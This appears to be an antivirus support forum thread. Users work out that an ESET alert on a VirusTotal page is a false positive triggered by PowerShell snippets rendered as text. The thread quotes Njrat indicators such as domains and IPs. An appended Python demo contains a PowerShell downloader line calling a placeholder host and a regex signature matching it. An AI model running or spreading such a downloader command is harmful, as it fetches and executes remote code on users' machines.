User13 0 Posted June 30
Hi, when I visit this link https://www.virustotal.com/gui/file/4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb/detection/f-4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb-1688041704 it's detected as infected with PowerShell/TrojanDownloader. I'm not sure if it's real or false, but in my settings I chose, for every automatic action, to ask the end user (real-time, web access, manual scan, etc.). For the web access scan there are usually two options, disconnect or ignore, and this should have happened in this case because it's downloading malware. But what really happened is that the malware was downloaded, real-time protection caught it and asked to clean or ignore, and it passed the web protection. I tested this link in Edge, Chrome and Firefox. In Edge and Chrome it was the same issue, but in Firefox the malware downloaded with no alert at all; when you scan the Firefox cache folder, you can find it there. Why is web access protection not strict in this case and lets the malware pass? Thanks
itman 1,594 Posted June 30 (edited)
I get no detection alert from ESET when accessing the posted VT link. Also no download activity that I can detect. It would be highly unlikely that VT would be infected with something. Post the ESET Detection log entry for this download you describe. At this point, it appears you are being redirected to some other web site that is downloading the malware. Also, one comment on the VT web page notes:

Quote
Joe Sandbox Analysis:
Verdict: MAL
Score: 100/100
Threat Name: Njrat, PasteDownloader
Malware Config: see the report for the full malware config
Domains: pasteio.com bogota2023.duckdns.org cdn.discordapp.com wtools.io pastebin.com
Hosts: 188.114.97.7 188.114.96.7 104.20.68.143 104.21.6.247 46.246.6.11 104.20.67.143 162.159.135.233
HTML Report: https://www.joesandbox.com/analysis/896277/0/html
PDF Report: https://www.joesandbox.com/analysis/896277/0/pdf
Executive Report: https://www.joesandbox.com/analysis/896277/0/executive
Incident Report: https://www.joesandbox.com/analysis/896277/0/irxml
IOCs: https://www.joesandbox.com/analysis/896277?idtype=analysisid

Edited June 30 by itman
User13 0 Posted June 30 Author
I recorded a video for that. If you use Firefox there is no alert for me either, but when you scan the Firefox cache folder, you will find it there.
User13 0 Posted June 30 Author
https://dai.ly/k3zuomepTFwJHVzfYBp
itman 1,594 Posted June 30 (edited)
45 minutes ago, User13 said: If you use Firefox there is no alert for me either, but when you scan the Firefox cache folder, you will find it there.

I did. Nothing detected. As far as your video goes, it's hard to figure out what you are doing there. What I see is:
1. You're uploading something to VT.
2. Then I see Kaspersky's online web site scanner running.
3. Finally, an ESET detection alert for the VT web page running in Chrome.
Make a video where you directly access https://www.virustotal.com/gui/file/4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb/detection/f-4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb-1688041704 from the browser.
Edited June 30 by itman
stackz 102 (ESET Insiders) Posted June 30 (edited)
I can reproduce this. When you go to the VT page you are actually landing on the behavior page, and ESET is picking up on some of the displayed PowerShell script parts. See example pics below. So essentially there's no live malware to get infected from.
At VT: [screenshot]
In cache: [screenshot]
Edited June 30 by stackz
itman 1,594 Posted June 30
4 minutes ago, stackz said: I can reproduce this. When you go to the VT page you are actually landing on the behavior page

Good find! I thought the same initially, but when I went to the behavior section from the posted VT link, I couldn't get anything there to trigger a detection. I must not have fully accessed the PowerShell code references. I've had the same ESET behavior on malware analysis web sites where the malware code is shown in clear text.
Nightowl 197 (Most Valued Members) Posted July 2
I can confirm that it happened to me before when I reported a zero-day here. I used to access the VT link without uploading anything and ESET would flag something that it isn't happy about, from Linux Endpoint. Thanks @stackz for the explanation.
SeriousHoax 80 Posted July 2
Yeah, I have seen this happening with other products that have HTTPS scanning. Usually, products that make use of YARA rules are triggered by the YARA rules on VT. Saw this the most with Avast, a couple of times with Kaspersky and ESET, but never with Bitdefender, maybe because they don't use YARA.
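To illustrate the mechanism stackz and SeriousHoax describe, here is an added triage example (not code from the thread or from any vendor): a string rule standing in for a YARA-style downloader signature is run over two constructed HTTP responses, an analysis page that merely renders a script snippet as text and an actual script download, and the hit is classified by where it occurs. The responses, the rule and the example.invalid URL are all constructed for the demo.

```python
import re

# Constructed sample HTTP responses (not real captures). The first is an
# analysis-style page that renders a PowerShell downloader snippet as text
# inside a <pre> block; the second is the same line served as a file download.
ANALYSIS_PAGE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
    "<html><body><h2>Behavior</h2><pre>powershell -c "
    "\"(New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""
    "</pre></body></html>"
)
SCRIPT_DOWNLOAD = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
    "Content-Disposition: attachment; filename=update.ps1\r\n\r\n"
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/p')\r\n"
)

# Stand-in for a YARA-style string rule matching a PowerShell downloader.
# A content-scanning engine that applies this to every response body will
# hit both samples above, which is exactly what the thread observes.
RULE = re.compile(r"New-Object\s+Net\.WebClient\)?\.DownloadString", re.I)


def parse_response(raw):
    """Split a raw HTTP response into (lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def triage(raw):
    """Classify a signature hit by the context it occurs in."""
    headers, body = parse_response(raw)
    match = RULE.search(body)
    if not match:
        return "clean"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "text/html":
        # Count unclosed <pre> tags before the hit: if the matched text sits
        # inside a rendered code block, the browser cache holds an HTML page
        # showing the snippet, not a script that was ever executed.
        before = body[: match.start()]
        if before.count("<pre") > before.count("</pre"):
            return "rendered snippet in analysis page"
        return "html page with inline script text"
    return "downloaded script"
```

When checking a browser cache hit like the one in the thread, the Content-Type of the cached object tells you which of these cases you are looking at.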